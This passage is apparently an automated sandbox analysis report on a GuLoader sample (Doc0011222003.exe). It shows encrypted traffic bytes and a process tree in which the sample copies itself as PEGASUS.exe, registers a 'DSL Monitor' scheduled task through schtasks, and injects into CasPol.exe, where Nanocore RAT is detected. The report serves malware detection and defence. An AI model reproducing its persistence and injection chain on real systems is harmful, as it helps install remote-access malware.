                                                                                    2021-11-23 13:42:55 UTC632INData Raw: 3c 1d 5e 8a 07 40 29 ab 04 55 c5 c8 a3 7b 86 d2 8a 16 5c d9 3a 00 23 5e b8 43 75 d7 43 0e b5 84 7f a5 f9 60 f1 7b 85 da f4 c1 9c f7 3a 68 da 94 60 fa a7 b6 e0 49 9b c3 46 9e 4f 31 89 1a f7 fe 5c 6c 14 22 df cc f6 86 e6 b5 92 aa ce da ff 86 0b 57 45 20 5c 80 68 95 99 47 59 44 dc f2 79 14 1d 95 75 3d 23 43 a0 48 bc 99 83 32 6b e1 fa 4b 4e a1 31 98 90 bb 51 cb 7b ef 4e e0 c1 d9 bb e5 05 74 a2 c4 74 10 78 d7 d9 18 51 67 fe 0c 34 04 29 18 ae da 7b 41 fe 57 55 1c 3c 55 19 03 30 70 55 57 85 4b 8c f9 49 4e 60 59 99 9e db 41 95 2b d2 17 8b bf 03 17 48 dd 25 7b c1 11 34 8d 2c 05 d1 02 d0 8f c1 a6 77 26 bf 4b d2 c6 48 60 a5 2f c2 6b 03 f2 31 c9 46 9b 75 07 cc bd 40 bd af ec af 72 5b 4f 39 62 56 0f 8c 8b f8 fc 05 25 6f 70 2d 12 97 c2 b2 6d 12 2c 3c 33 f7 00 b0 fc e6
                                                                                    Data Ascii: <^@)U{\:#^CuC`{:h`IFO1\l"WE \hGYDyu=#CH2kKN1Q{NttxQg4){AWU<U0pUWKIN`YA+H%{4,w&KH`/k1Fu@r[O9bV%op-m,<3
                                                                                    2021-11-23 13:42:55 UTC634INData Raw: 9e 1e 2b 1e 4f 96 62 a5 09 fb 69 ad 3e 66 d7 57 c3 10 92 4a 62 45 bd 28 fa 1e 5b 12 e2 e6 16 31 50 62 20 1f 7d 59 47 fa 4a 0e b3 fd ef 44 1f 71 7f 43 d0 d3 21 76 8d ca f7 8a 12 ff a9 1a 40 f9 a7 89 0e 9f 92 55 de eb 61 09 a1 35 63 93 20 f3 b1 7c ef 25 87 34 79 a1 e6 25 d9 c6 d6 cf e3 3a b4 13 f7 6b 69 0a ec 81 fb b5 3d b1 f6 c2 26 2b b7 7a fd 8b b3 ba e7 b0 dd 2d 79 68 99 64 24 5d ca 03 c9 bd 10 c4 a8 db 81 cd d5 87 49 91 fa 97 d0 37 77 f5 1c c8 4e 63 fc 77 a8 ee 4d a4 32 07 19 af 18 54 67 e0 d8 69 58 d8 92 d5 be 5a 4f df 2a 10 bb 98 b2 2d ea 06 fa 90 b7 88 f5 75 50 d8 b4 fc ac 84 ea de 5f af 3f 96 f0 b3 34 ee d7 d0 ae ed 64 17 76 46 d7 57 eb a9 99 5b 5e 26 a2 0c 15 f5 bb 14 e2 9e c6 9e e7 d6 8a ef dd be eb 30 ec 30 cf df 2e ab 1c 00 f4 60 0f e1 e6 76 ec
                                                                                    Data Ascii: +Obi>fWJbE([1Pb }YGJDqC!v@Ua5c |%4y%:ki=&+z-yhd$]I7wNcwM2TgiXZO*-uP_?4dvFW[^&00.`v


                                                                                    Code Manipulations

                                                                                    Statistics

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Start time:14:37:46
                                                                                    Start date:23/11/2021
                                                                                    Path:C:\Users\user\Desktop\Doc0011222003.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\Doc0011222003.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:81920 bytes
                                                                                    MD5 hash:E70022C5636DB76B71C8B2C56552C60C
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:Visual Basic
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.78191516120.0000000000540000.00000040.00000010.sdmp, Author: Joe Security
                                                                                    Reputation:low

                                                                                    General

                                                                                    Start time:14:38:10
                                                                                    Start date:23/11/2021
                                                                                    Path:C:\Windows\System32\backgroundTaskHost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\WINDOWS\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                    Imagebase:0x7ff7171c0000
                                                                                    File size:19776 bytes
                                                                                    MD5 hash:DA7063B17DBB8BBB3015351016868006
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate

                                                                                    General

                                                                                    Start time:14:39:41
                                                                                    Start date:23/11/2021
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\Doc0011222003.exe"
                                                                                    Imagebase:0xee0000
                                                                                    File size:106496 bytes
                                                                                    MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Reputation:moderate

                                                                                    General

                                                                                    Start time:14:39:41
                                                                                    Start date:23/11/2021
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff6136c0000
                                                                                    File size:875008 bytes
                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate

                                                                                    General

                                                                                    Start time:14:40:02
                                                                                    Start date:23/11/2021
                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpF23C.tmp
                                                                                    Imagebase:0x9c0000
                                                                                    File size:187904 bytes
                                                                                    MD5 hash:478BEAEC1C3A9417272BC8964ADD1CEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low

                                                                                    General

                                                                                    Start time:14:40:02
                                                                                    Start date:23/11/2021
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff6136c0000
                                                                                    File size:875008 bytes
                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate

                                                                                    General

                                                                                    Start time:14:40:03
                                                                                    Start date:23/11/2021
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe 0
                                                                                    Imagebase:0x2a0000
                                                                                    File size:106496 bytes
                                                                                    MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Reputation:moderate

                                                                                    General

                                                                                    Start time:14:40:04
                                                                                    Start date:23/11/2021
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff6136c0000
                                                                                    File size:875008 bytes
                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate

                                                                                    General

                                                                                    Start time:14:40:11
                                                                                    Start date:23/11/2021
                                                                                    Path:C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:81920 bytes
                                                                                    MD5 hash:E70022C5636DB76B71C8B2C56552C60C
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:Visual Basic
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000013.00000002.79811126050.0000000000560000.00000040.00000010.sdmp, Author: Joe Security
                                                                                    Antivirus matches:
                                                                                    • Detection: 14%, Metadefender, Browse
                                                                                    • Detection: 9%, ReversingLabs
                                                                                    Reputation:low

                                                                                    General

                                                                                    Start time:14:40:19
                                                                                    Start date:23/11/2021
                                                                                    Path:C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:81920 bytes
                                                                                    MD5 hash:E70022C5636DB76B71C8B2C56552C60C
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:Visual Basic
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000014.00000002.79927031030.0000000000510000.00000040.00000010.sdmp, Author: Joe Security
                                                                                    Reputation:low

                                                                                    General

                                                                                    Start time:14:42:21
                                                                                    Start date:23/11/2021
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exe"
                                                                                    Imagebase:0x200000
                                                                                    File size:106496 bytes
                                                                                    MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language

                                                                                    General

                                                                                    Start time:14:42:21
                                                                                    Start date:23/11/2021
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exe"
                                                                                    Imagebase:0x100000
                                                                                    File size:106496 bytes
                                                                                    MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language

                                                                                    General

                                                                                    Start time:14:42:22
                                                                                    Start date:23/11/2021
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exe"
                                                                                    Imagebase:0x9f0000
                                                                                    File size:106496 bytes
                                                                                    MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000002.79863339274.000000001E141000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: NanoCore, Description: unknown, Source: 00000017.00000002.79863339274.000000001E141000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000017.00000000.79578342155.0000000000E00000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000002.79863641955.000000001F141000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: NanoCore, Description: unknown, Source: 00000017.00000002.79863641955.000000001F141000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                                                                                    General

                                                                                    Start time:14:42:22
                                                                                    Start date:23/11/2021
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff6136c0000
                                                                                    File size:875008 bytes
                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language

                                                                                    General

                                                                                    Start time:14:42:33
                                                                                    Start date:23/11/2021
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exe"
                                                                                    Imagebase:0x90000
                                                                                    File size:106496 bytes
                                                                                    MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language

                                                                                    General

                                                                                    Start time:14:42:34
                                                                                    Start date:23/11/2021
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exe"
                                                                                    Imagebase:0x8a0000
                                                                                    File size:106496 bytes
                                                                                    MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000002.79978855466.000000001F061000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: NanoCore, Description: unknown, Source: 0000001B.00000002.79978855466.000000001F061000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000002.79978540386.000000001E061000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: NanoCore, Description: unknown, Source: 0000001B.00000002.79978540386.000000001E061000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                                                                                    General

                                                                                    Start time:14:42:34
                                                                                    Start date:23/11/2021
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff6136c0000
                                                                                    File size:875008 bytes
                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language

                                                                                    Disassembly

                                                                                    Code Analysis

                                                                                    Reset < >